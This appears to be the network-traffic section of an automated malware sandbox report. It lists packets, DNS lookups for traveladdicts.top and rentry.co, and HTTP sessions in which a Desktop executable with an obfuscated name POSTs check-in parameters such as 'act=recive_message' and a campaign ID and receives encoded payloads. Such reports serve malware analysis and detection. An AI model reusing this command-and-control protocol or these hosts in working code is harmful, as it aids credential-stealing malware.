                                                                                                                                                                  Jan 28, 2025 16:16:13.366911888 CET49743443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:13.366923094 CET44349743104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:13.829804897 CET44349743104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:13.829900026 CET49743443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:13.831145048 CET49743443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:13.831166029 CET44349743104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:13.831440926 CET44349743104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:13.841021061 CET49743443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:13.841182947 CET49743443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:13.841227055 CET44349743104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:25.809106112 CET44349743104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:25.809254885 CET44349743104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:25.809343100 CET49743443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:25.809528112 CET49743443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:25.809551954 CET44349743104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:26.202224016 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:26.202272892 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:26.202379942 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:26.202706099 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:26.202718973 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:26.672157049 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:26.672332048 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:26.676156044 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:26.676172972 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:26.676520109 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:26.677748919 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:26.677802086 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:26.677834034 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:26.677894115 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:26.677902937 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:38.855979919 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:38.856051922 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:38.856122971 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:38.856234074 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:38.856256962 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:39.699850082 CET49752443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:39.699884892 CET44349752104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:39.699944019 CET49752443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:39.700242043 CET49752443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:39.700258970 CET44349752104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:40.165772915 CET44349752104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:40.165942907 CET49752443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:40.167100906 CET49752443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:40.167119026 CET44349752104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:40.167381048 CET44349752104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:40.168739080 CET49752443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:40.168767929 CET49752443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:40.168781996 CET44349752104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:40.931557894 CET44349752104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:40.931663036 CET44349752104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:40.931768894 CET49752443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:40.931941986 CET49752443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:40.931962967 CET44349752104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:42.577606916 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:42.577646971 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:42.577725887 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:42.578025103 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:42.578039885 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.058063984 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.058157921 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.059923887 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.059947014 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.060893059 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.062725067 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.063473940 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.063543081 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.063672066 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.063719988 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.063886881 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.063929081 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.064285994 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.064338923 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.064524889 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.064578056 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.064785957 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.064846039 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.064867020 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.064881086 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.065073967 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.065114021 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.065151930 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.065361023 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.065402985 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.073697090 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.076596975 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.076654911 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.076709032 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.076760054 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.077455997 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.078059912 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:56.495273113 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:56.495373964 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:56.495482922 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:56.495583057 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:56.495625973 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:56.631604910 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:56.631650925 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:56.631726027 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:56.631985903 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:56.632004976 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.101037979 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.101131916 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:57.140688896 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:57.140749931 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.141047955 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.149715900 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:57.149771929 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:57.149925947 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.561250925 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.561501980 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.561575890 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:57.561688900 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:57.561707973 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.561718941 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:57.561724901 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.573004961 CET49865443192.168.2.4104.26.3.16
                                                                                                                                                                  Jan 28, 2025 16:16:57.573091984 CET44349865104.26.3.16192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.573194981 CET49865443192.168.2.4104.26.3.16
                                                                                                                                                                  Jan 28, 2025 16:16:57.573499918 CET49865443192.168.2.4104.26.3.16
                                                                                                                                                                  Jan 28, 2025 16:16:57.573535919 CET44349865104.26.3.16192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:58.057782888 CET44349865104.26.3.16192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:58.057907104 CET49865443192.168.2.4104.26.3.16
                                                                                                                                                                  Jan 28, 2025 16:16:58.059489965 CET49865443192.168.2.4104.26.3.16
                                                                                                                                                                  Jan 28, 2025 16:16:58.059508085 CET44349865104.26.3.16192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:58.059854031 CET44349865104.26.3.16192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:58.061459064 CET49865443192.168.2.4104.26.3.16
                                                                                                                                                                  Jan 28, 2025 16:16:58.107325077 CET44349865104.26.3.16192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:58.361649036 CET44349865104.26.3.16192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:58.361779928 CET44349865104.26.3.16192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:58.361843109 CET49865443192.168.2.4104.26.3.16
                                                                                                                                                                  Jan 28, 2025 16:16:58.361880064 CET44349865104.26.3.16192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:58.361977100 CET44349865104.26.3.16192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:58.362035990 CET49865443192.168.2.4104.26.3.16
                                                                                                                                                                  Jan 28, 2025 16:16:58.362051010 CET44349865104.26.3.16192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:58.362169027 CET44349865104.26.3.16192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:58.362238884 CET49865443192.168.2.4104.26.3.16
                                                                                                                                                                  Jan 28, 2025 16:16:58.362329960 CET49865443192.168.2.4104.26.3.16
                                                                                                                                                                  Jan 28, 2025 16:16:58.362361908 CET44349865104.26.3.16192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:58.362389088 CET49865443192.168.2.4104.26.3.16
                                                                                                                                                                  Jan 28, 2025 16:16:58.362404108 CET44349865104.26.3.16192.168.2.4
                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Jan 28, 2025 16:15:57.076904058 CET5570153192.168.2.41.1.1.1
                                                                                                                                                                  Jan 28, 2025 16:15:57.423588991 CET53557011.1.1.1192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.564513922 CET5724353192.168.2.41.1.1.1
                                                                                                                                                                  Jan 28, 2025 16:16:57.572319031 CET53572431.1.1.1192.168.2.4
                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                  Jan 28, 2025 16:15:57.076904058 CET192.168.2.41.1.1.10x7a76Standard query (0)traveladdicts.topA (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 28, 2025 16:16:57.564513922 CET192.168.2.41.1.1.10xa0e5Standard query (0)rentry.coA (IP address)IN (0x0001)false
                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                  Jan 28, 2025 16:15:57.423588991 CET1.1.1.1192.168.2.40x7a76No error (0)traveladdicts.top104.21.60.241A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 28, 2025 16:15:57.423588991 CET1.1.1.1192.168.2.40x7a76No error (0)traveladdicts.top172.67.202.141A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 28, 2025 16:16:57.572319031 CET1.1.1.1192.168.2.40xa0e5No error (0)rentry.co104.26.3.16A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 28, 2025 16:16:57.572319031 CET1.1.1.1192.168.2.40xa0e5No error (0)rentry.co104.26.2.16A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 28, 2025 16:16:57.572319031 CET1.1.1.1192.168.2.40xa0e5No error (0)rentry.co172.67.75.40A (IP address)IN (0x0001)false
                                                                                                                                                                  • traveladdicts.top
                                                                                                                                                                  • rentry.co
                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  0192.168.2.449734104.21.60.2414437412C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-28 15:15:58 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                  Host: traveladdicts.top
                                                                                                                                                                  2025-01-28 15:15:58 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                  Data Ascii: act=life
                                                                                                                                                                  2025-01-28 15:15:58 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 28 Jan 2025 15:15:58 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Set-Cookie: PHPSESSID=ji2iv0cji9n3pccniv4gn63acd; expires=Sat, 24 May 2025 09:02:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VLRnUIMkQZanXtFR2qPwfV2PB%2FZE5C%2B7jlrv%2F2GEZgAGEbcOQZo0OMVVE7dPeDrjxW1y7V9YMJNUKvVtVW7oSy%2BF%2FXhlCz6pwlKxEk5z8obgxWXqS12QQmy3XwpMjp32Gp%2Bvkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9091f0e019aa43c7-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1572&rtt_var=616&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=908&delivery_rate=1737061&cwnd=219&unsent_bytes=0&cid=84de2c2c5b4bcc56&ts=821&x=0"
                                                                                                                                                                  2025-01-28 15:15:58 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                  Data Ascii: 2ok
                                                                                                                                                                  2025-01-28 15:15:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  1192.168.2.449736104.21.60.2414437412C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-28 15:15:59 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                  Content-Length: 49
                                                                                                                                                                  Host: traveladdicts.top
                                                                                                                                                                  2025-01-28 15:15:59 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 26 6a 3d
                                                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=MeHdy4--pl2yan1&j=
                                                                                                                                                                  2025-01-28 15:15:59 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 28 Jan 2025 15:15:59 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Set-Cookie: PHPSESSID=773i6bvt2hvmv1k1nkh25bpv26; expires=Sat, 24 May 2025 09:02:38 GMT; Max-Age=9999999; path=/
                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KkDdyab3ZGMnWzHJ2dODs4OOVRZ7xpTdF06%2FWC6QwLK%2FTpsPFvenk9UxK3TvBzblHCIsBJdQoZ0rt0me6ievTrFHTuknQ5wszkg28H%2Bsam2G4cYc7UY2nM7qJa1CZEbbejsdrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9091f0e82a44ef9d-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2041&min_rtt=2023&rtt_var=771&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=950&delivery_rate=1443400&cwnd=175&unsent_bytes=0&cid=12dc5fb2f04f3ae8&ts=493&x=0"
                                                                                                                                                                  2025-01-28 15:15:59 UTC240INData Raw: 34 36 65 0d 0a 53 2f 7a 59 48 73 32 66 63 6b 64 35 34 2b 32 5a 56 77 47 35 78 72 47 77 69 56 74 54 76 5a 42 6c 65 47 78 50 5a 51 35 33 4e 63 4d 77 33 71 34 38 39 36 74 65 5a 51 71 47 7a 36 4d 6a 63 38 79 6a 6e 5a 4c 6f 50 33 47 48 39 67 51 55 48 79 70 4a 4c 41 46 59 34 58 47 61 75 58 4b 2b 2b 6c 35 6c 48 4a 76 50 6f 77 78 36 6d 36 50 66 6b 72 4e 35 4e 74 66 79 42 42 51 4f 4c 67 35 68 42 31 6d 67 49 35 43 2f 64 71 6a 38 46 69 59 56 6a 6f 6a 38 4d 6d 44 54 71 4e 6a 64 34 54 5a 78 6b 62 49 41 41 6b 35 31 52 30 4d 53 51 61 49 47 6e 61 74 31 37 2b 4a 65 50 46 75 47 67 37 74 74 49 39 69 6a 30 39 7a 76 50 7a 6a 56 2b 41 30 63 44 79 73 50 66 68 35 54 71 79 4f 65 76 48 65 69 39 51 49 72 48 34 6d 44 2b 6a 68 67 6d 2b 71
                                                                                                                                                                  Data Ascii: 46eS/zYHs2fckd54+2ZVwG5xrGwiVtTvZBleGxPZQ53NcMw3q4896teZQqGz6Mjc8yjnZLoP3GH9gQUHypJLAFY4XGauXK++l5lHJvPowx6m6PfkrN5NtfyBBQOLg5hB1mgI5C/dqj8FiYVjoj8MmDTqNjd4TZxkbIAAk51R0MSQaIGnat17+JePFuGg7ttI9ij09zvPzjV+A0cDysPfh5TqyOevHei9QIrH4mD+jhgm+q
                                                                                                                                                                  2025-01-28 15:15:59 UTC901INData Raw: 54 31 66 4e 35 61 5a 2b 68 4e 52 6b 66 50 42 4a 68 42 56 48 68 4e 74 43 6a 50 4b 6a 78 55 48 31 62 69 59 50 31 4d 47 44 55 6f 39 4c 53 2b 54 59 78 33 50 6f 50 48 67 51 69 43 47 4d 62 58 61 59 68 6c 37 31 7a 71 50 55 57 4b 68 6a 42 77 62 73 79 65 35 76 38 6b 2f 4c 37 4f 6a 4c 4c 2f 78 5a 61 45 57 4d 65 4c 42 4a 62 34 58 48 65 76 48 4b 75 38 42 41 33 45 34 71 45 2f 69 64 6f 30 71 6e 65 30 75 59 7a 50 74 7a 79 41 42 41 45 49 67 31 6f 47 46 71 6e 4b 5a 37 36 4d 75 2f 36 43 47 56 44 77 61 7a 2b 4a 57 54 58 73 70 48 6f 71 79 5a 2f 78 72 49 41 46 6b 35 31 52 32 51 51 56 4b 49 69 6b 62 6c 30 70 4f 38 51 4e 78 32 4d 69 75 6b 7a 5a 74 57 75 30 4d 44 68 4e 7a 66 63 2b 77 77 54 43 79 6f 44 4c 46 73 58 70 6a 48 65 34 6a 79 4f 38 42 73 70 45 5a 61 50 75 79 6f 74 77 75
                                                                                                                                                                  Data Ascii: T1fN5aZ+hNRkfPBJhBVHhNtCjPKjxUH1biYP1MGDUo9LS+TYx3PoPHgQiCGMbXaYhl71zqPUWKhjBwbsye5v8k/L7OjLL/xZaEWMeLBJb4XHevHKu8BA3E4qE/ido0qne0uYzPtzyABAEIg1oGFqnKZ76Mu/6CGVDwaz+JWTXspHoqyZ/xrIAFk51R2QQVKIikbl0pO8QNx2MiukzZtWu0MDhNzfc+wwTCyoDLFsXpjHe4jyO8BspEZaPuyotwu
                                                                                                                                                                  2025-01-28 15:15:59 UTC1369INData Raw: 34 35 32 36 0d 0a 77 76 63 63 43 38 48 6c 6f 4a 49 55 63 30 56 56 69 75 4a 70 61 36 66 61 76 77 46 43 51 57 6a 59 62 34 4f 57 2f 54 71 64 2f 57 35 44 45 35 33 50 6f 56 46 41 41 72 41 57 77 51 46 2b 39 70 6d 61 49 38 39 37 30 30 4b 77 79 56 68 4c 6b 41 59 4e 57 71 31 4d 53 72 4a 6e 2f 47 73 67 41 57 54 6e 56 48 59 68 68 63 72 53 36 58 75 33 2b 76 39 78 34 71 45 59 6d 48 2b 7a 68 69 30 4b 7a 56 33 2b 41 32 50 74 6a 36 42 42 59 4c 49 41 51 73 57 78 65 6d 4d 64 37 69 50 49 72 7a 45 7a 51 4b 77 37 72 34 4f 32 33 63 73 70 50 4e 70 53 42 78 32 50 35 48 51 6b 34 6e 41 47 73 52 57 71 73 71 6d 72 35 78 6f 50 51 5a 4c 41 6d 4c 67 2f 55 6e 62 74 47 68 33 64 37 75 4e 6a 48 65 38 77 6b 51 42 57 31 4a 4c 42 4a 50 34 58 48 65 6c 58 47 2f 37 78 6f 75 43 73 4f 36 2b 44 74
                                                                                                                                                                  Data Ascii: 4526wvccC8HloJIUc0VViuJpa6favwFCQWjYb4OW/Tqd/W5DE53PoVFAArAWwQF+9pmaI89700KwyVhLkAYNWq1MSrJn/GsgAWTnVHYhhcrS6Xu3+v9x4qEYmH+zhi0KzV3+A2Ptj6BBYLIAQsWxemMd7iPIrzEzQKw7r4O23cspPNpSBx2P5HQk4nAGsRWqsqmr5xoPQZLAmLg/UnbtGh3d7uNjHe8wkQBW1JLBJP4XHelXG/7xouCsO6+Dt
                                                                                                                                                                  2025-01-28 15:15:59 UTC1369INData Raw: 2f 33 6f 4c 7a 75 66 37 55 6b 44 54 69 6f 4c 4c 45 30 58 71 79 57 61 75 58 43 6d 38 52 30 6b 48 34 61 43 2f 7a 56 6c 33 61 48 53 32 65 4d 31 50 74 58 2b 41 78 59 48 4b 77 74 76 46 6c 48 68 5a 39 36 39 5a 4f 2b 6c 55 41 51 57 69 6f 50 37 4e 6e 4c 63 35 4a 32 53 35 54 38 78 6e 36 6f 52 43 68 6b 71 47 43 49 4d 46 36 59 6c 33 75 49 38 70 65 38 56 4b 78 2b 4c 69 76 38 35 61 64 75 68 77 64 72 74 50 6a 33 58 39 77 67 63 43 79 41 41 5a 78 5a 46 73 79 71 61 74 48 44 76 73 31 41 69 41 38 48 58 75 78 42 30 32 4c 54 56 30 61 73 6d 66 38 61 79 41 42 5a 4f 64 55 64 73 47 31 75 71 4c 70 57 78 65 4b 76 39 48 53 34 56 6a 34 62 33 50 57 2f 63 74 74 37 58 34 7a 4d 34 32 76 34 4b 47 52 77 75 42 69 78 62 46 36 59 78 33 75 49 38 69 4d 34 6e 42 6c 75 65 77 65 4a 31 5a 4e 66 6b
                                                                                                                                                                  Data Ascii: /3oLzuf7UkDTioLLE0XqyWauXCm8R0kH4aC/zVl3aHS2eM1PtX+AxYHKwtvFlHhZ969ZO+lUAQWioP7NnLc5J2S5T8xn6oRChkqGCIMF6Yl3uI8pe8VKx+Liv85aduhwdrtPj3X9wgcCyAAZxZFsyqatHDvs1AiA8HXuxB02LTV0asmf8ayABZOdUdsG1uqLpWxeKv9HS4Vj4b3PW/ctt7X4zM42v4KGRwuBixbF6Yx3uI8iM4nBlueweJ1ZNfk
